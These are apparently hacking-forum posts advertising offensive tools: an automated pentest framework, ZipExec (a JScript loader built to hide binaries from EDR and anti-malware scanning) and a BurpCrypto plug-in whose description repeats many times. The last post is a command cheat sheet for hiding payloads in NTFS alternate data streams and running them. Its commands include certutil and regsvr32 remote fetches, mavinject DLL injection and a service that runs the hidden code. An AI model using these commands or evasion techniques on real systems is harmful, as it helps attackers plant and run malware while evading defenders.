Search the Community

Rekono combines other hacking tools and its results to execute complete pentesting processes against a target in an automated way. The findings obtained during the executions will be sent to the user via email or Telegram notifications and also can be imported into Defect-Dojo if advanced vulnerability management is needed. Moreover, Rekono includes a Telegram bot that can be used to perform executions easily from anywhere and using any device. Features Combine hacking tools to create pentesting processes Execute pentesting processes Execute pentesting tools Review findings and receive them via email or Telegram notifications Use Defect-Dojo integration to import the findings detected by Rekono Execute tools and processes from Telegram Bot Wordlists management Supported tools theHarvester EmailHarvester EmailFinder Nmap Sslscan SSLyze SSH Audit SMBMap Dirsearch GitLeaks Log4j Scanner CMSeeK OWASP JoomScan OWASP ZAP Nikto SearchSploit Metasploit [hide][Hidden Content]]

ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms. [hide][Hidden Content]]

Burpcrypto is a collection of burpsuite encryption plug-ins, supporting AES/RSA/DES/ExecJs(execute JS encryption code in burpsuite). Usage Add this jar to your burpsuite’s Extensions. Switch to the BurpCrypto tab, select you to need the Cipher tab. Set key or some value. Press “Add processor”, and give a name for this processor. Switch to Intruder->Payloads->Payload Processing. Press “Add”, select “Invoke Burp extension”, and the select processor you just created. Press “Start attack”, have fun! Changelog v0.1.9.1 Fix rsa dead loop issue (#16) [hide][Hidden Content]]

ZipExec ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on a disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms. [hide][Hidden Content]]

Burpcrypto is a collection of burpsuite encryption plug-ins, supporting AES/RSA/DES/ExecJs(execute JS encryption code in burpsuite). Usage Add this jar to your burpsuite’s Extensions. Switch to the BurpCrypto tab, select you to need the Cipher tab. Set key or some value. Press “Add processor”, and give a name for this processor. Switch to Intruder->Payloads->Payload Processing. Press “Add”, select “Invoke Burp extension”, and the select processor you just created. Press “Start attack”, have fun! Key Example Aes Key(UTF8String): abcdefgabcdefg12 Aes IV(UTF8String): abcdefgabcdefg12 Rsa X509 Key: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCC0hrRIjb3noDWNtbDpANbjt5Iwu2NFeDwU16Ec87ToqeoIm2KI+cOs81JP9aTDk/jkAlU97mN8wZkEMDr5utAZtMVht7GLX33Wx9XjqxUsDfsGkqNL8dXJklWDu9Zh80Ui2Ug+340d5dZtKtd+nv09QZqGjdnSp9PTfFDBY133QIDAQAB Rsa Modulus: ca27d90f03753cbbc9958011baf701ac99305b63f68e26ab5617593e01d2fb519127fb87bafbe6e0472ec3a038575fa292adadbc79390a955a61b29431f78f4734773048a45dcf100e23cabf2df11a55aa90cd6b024a44eed1096c3b9e1408d46aae54d7291b82fe4b7867c5eaa45e9cc0ba7f7ae3e5593337c7dcbace2d02ed2fbbff26c6df8a32bb26be80603fcd94c6c8dbd67878d77b37fedcf808e3d8f469aaa7c65d033d547a5c8ea9bdd5c89b836c65852f355a5efd9c7137a186a62b5eb0e052c8be3096d3b51133f8a8c108292a296c99d37bad42bcc3f6c39fa5e583582942b4fc4e7ff4b6779fff5bbaddc65b19c7c57d8cdb39b1a994e08d4a2f50793d8f707d069c380baf0f64bfdce3b35d0b5c5c59348a35a082012aaf4991080abf518b55787969ff24186cb95f7e7218c904cf1dcaeb5bed723e305b83f2e85d6f116d2c7400f9e49d904db8a5a3a0701cdb579fbf3128511acd0f789ece1233ed926d705b3b0dfa34bf33f5ae4bdc611a602aa03aaae13400bc7ad3813ea4474dc62de3d0cb1f5aac277d895a75d38f9b920938fa6b1de35bd6132798c122403c685bdb6e5e24bbd70cfb3e968da0b8affd398e539e7c1e7add09891780bcbd278f3900499ae09cee0dc62e3f92e70001bab6d46261d2801a37f80d84d0e39fce6eaedf106a61b5961960641b9db0e4e23c770e6370ac5d61c6c9eb0f07 Rsa Exponent: 010001 Changelog v0.1.9 Fix JS editor can’t activate. add htmlunit JS engine. add jre built-in JS engine. add JS engine switcher. [hide][Hidden Content]]

BurpCrypto Burpcrypto is a collection of burpsuite encryption plug-ins, supporting AES/RSA/DES/ExecJs(execute JS encryption code in burpsuite). Usage Add this jar to your burpsuite’s Extensions. Switch to the BurpCrypto tab, select you to need the Cipher tab. Set key or some value. Press “Add processor”, and give a name for this processor. Switch to Intruder->Payloads->Payload Processing. Press “Add”, select “Invoke Burp extension”, and the select processor you just created. Press “Start attack”, have fun! Key Example Aes Key(UTF8String): abcdefgabcdefg12 Aes IV(UTF8String): abcdefgabcdefg12 Rsa X509 Key: MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCC0hrRIjb3noDWNtbDpANbjt5Iwu2NFeDwU16Ec87ToqeoIm2KI+cOs81JP9aTDk/jkAlU97mN8wZkEMDr5utAZtMVht7GLX33Wx9XjqxUsDfsGkqNL8dXJklWDu9Zh80Ui2Ug+340d5dZtKtd+nv09QZqGjdnSp9PTfFDBY133QIDAQAB Rsa Modulus: ca27d90f03753cbbc9958011baf701ac99305b63f68e26ab5617593e01d2fb519127fb87bafbe6e0472ec3a038575fa292adadbc79390a955a61b29431f78f4734773048a45dcf100e23cabf2df11a55aa90cd6b024a44eed1096c3b9e1408d46aae54d7291b82fe4b7867c5eaa45e9cc0ba7f7ae3e5593337c7dcbace2d02ed2fbbff26c6df8a32bb26be80603fcd94c6c8dbd67878d77b37fedcf808e3d8f469aaa7c65d033d547a5c8ea9bdd5c89b836c65852f355a5efd9c7137a186a62b5eb0e052c8be3096d3b51133f8a8c108292a296c99d37bad42bcc3f6c39fa5e583582942b4fc4e7ff4b6779fff5bbaddc65b19c7c57d8cdb39b1a994e08d4a2f50793d8f707d069c380baf0f64bfdce3b35d0b5c5c59348a35a082012aaf4991080abf518b55787969ff24186cb95f7e7218c904cf1dcaeb5bed723e305b83f2e85d6f116d2c7400f9e49d904db8a5a3a0701cdb579fbf3128511acd0f789ece1233ed926d705b3b0dfa34bf33f5ae4bdc611a602aa03aaae13400bc7ad3813ea4474dc62de3d0cb1f5aac277d895a75d38f9b920938fa6b1de35bd6132798c122403c685bdb6e5e24bbd70cfb3e968da0b8affd398e539e7c1e7add09891780bcbd278f3900499ae09cee0dc62e3f92e70001bab6d46261d2801a37f80d84d0e39fce6eaedf106a61b5961960641b9db0e4e23c770e6370ac5d61c6c9eb0f07 Rsa Exponent: 010001 Changelog v0.1.8 Fix DESede keyspec error (#12) Fix js editor can’t activate. Add des zeropadding. [hide][Hidden Content]]

BurpCrypto Burpcrypto is a collection of burpsuite encryption plug-ins, supporting AES/RSA/DES/ExecJs(execute JS encryption code in burpsuite). Usage Add this jar to your burpsuite’s Extensions. Switch to the BurpCrypto tab, select you to need the Cipher tab. Set key or some value. Press “Add processor”, and give a name for this processor. Switch to Intruder->Payloads->Payload Processing. Press “Add”, select “Invoke Burp extension”, and the select processor you just created. Press “Start attack”, have fun! Changelog v0.1.7 fix rsa data length limit (#10) [hide][Hidden Content]]

BurpCrypto Burpcrypto is a collection of burpsuite encryption plug-ins, supporting AES/RSA/DES/ExecJs(execute JS encryption code in burpsuite). Usage Add this jar to your burpsuite’s Extensions. Switch to the BurpCrypto tab, select you to need the Cipher tab. Set key or some value. Press “Add processor”, and give a name for this processor. Switch to Intruder->Payloads->Payload Processing. Press “Add”, select “Invoke Burp extension”, and the select processor you just created. Press “Start attack”, have fun! Changelog v0.1.6 opt js support. add Get PlainText to all panel. [hide][Hidden Content]]

BurpCrypto Burpcrypto is a collection of burpsuite encryption plug-ins, supporting AES/RSA/DES/ExecJs(execute JS encryption code in burpsuite). Usage Add this jar to your burpsuite’s Extensions. Switch to the BurpCrypto tab, select you to need the Cipher tab. Set key or some value. Press “Add processor”, and give a name for this processor. Switch to Intruder->Payloads->Payload Processing. Press “Add”, select “Invoke Burp extension”, and the select processor you just created. Press “Start attack”, have fun! [hide][Hidden Content]]

BurpCrypto Burpcrypto is a collection of burpsuite encryption plug-ins, supporting AES/RSA/DES/ExecJs(execute JS encryption code in burpsuite). Usage Add this jar to your burpsuite’s Extensions. Switch to the BurpCrypto tab, select you to need the Cipher tab. Set key or some value. Press “Add processor”, and give a name for this processor. Switch to Intruder->Payloads->Payload Processing. Press “Add”, select “Invoke Burp extension”, and the select processor you just created. Press “Start attack”, have fun! Changelog v0.1.4.2 add aes zeropadding. [hide][Hidden Content]]

Burpcrypto is a collection of burpsuite encryption plug-ins, supporting AES/RSA/DES/ExecJs(execute JS encryption code in burpsuite). Usage Add this jar to your burpsuite’s Extensions. Switch to the BurpCrypto tab, select you to need the Cipher tab. Set key or some value. Press “Add processor”, and give a name for this processor. Switch to Intruder->Payloads->Payload Processing. Press “Add”, select “Invoke Burp extension”, and the select processor you just created. Press “Start attack”, have fun! Changelog v0.1.4.1 fix js engine bugs. [hide][Hidden Content]]

BurpCrypto Burpcrypto is a collection of burpsuite encryption plug-ins, supporting AES/RSA/DES/ExecJs(execute JS encryption code in burpsuite). Usage Add this jar to your burpsuite’s Extensions. Switch to the BurpCrypto tab, select you to need the Cipher tab. Set key or some value. Press “Add processor”, and give a name for this processor. Switch to Intruder->Payloads->Payload Processing. Press “Add”, select “Invoke Burp extension”, and the select processor you just created. Press “Start attack”, have fun! [hide][Hidden Content]]

Putting data in Alternate data streams and how to execute it #Add content to ADS type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe certutil.exe -urlcache -split -f [Hidden Content] c:\temp:ttt makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}" curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:[Hidden Content] ^scrobj.dll > fakefile.doc:reg32.bat #Executing the ADS content * WMIC wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"' * Rundll32 rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll * Cscript cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs" * Wscript wscript c:\ads\file.txt:script.vbs echo GetObject("script:[Hidden Content]") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js * Forfiles forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe" * Mavinject.exe c:\windows\SysWOW64\notepad.exe tasklist | findstr notepad notepad.exe 4172 31C5CE94259D4006 2 18,476 K type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll" c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll" * MSHTA mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta" (Does not work on Windows 10 1903 and newer) * Control.exe control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll [Hidden Content] * Create service and run sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto sc start evilservice [Hidden Content] * Powershell.exe powershell -ep bypass - < c:\temp:ttt * Powershell.exe powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}" * Powershell.exe Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe} * Regedit.exe regedit c:\ads\file.txt:regfile.reg * Bitsadmin.exe bitsadmin /create myfile bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL bitsadmin /RESUME myfile * AppVLP.exe AppVLP.exe c:\windows\tracing\test.txt:ha.exe * Cmd.exe cmd.exe - < fakefile.doc:reg32.bat [Hidden Content] * Ftp.exe ftp -s:fakefile.txt:aaaa.txt [Hidden Content] * ieframe.dll , shdocvw.dll (ads) echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt [Hidden Content] * bash.exe echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh bash.exe -c $(fakefile.txt:payload.sh) [Hidden Content] * Regsvr32 type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS regsvr32 /s /u /i:[Hidden Content] Textfile.txt:LoveADS Reference [Hidden Content] More Info [Hidden Content]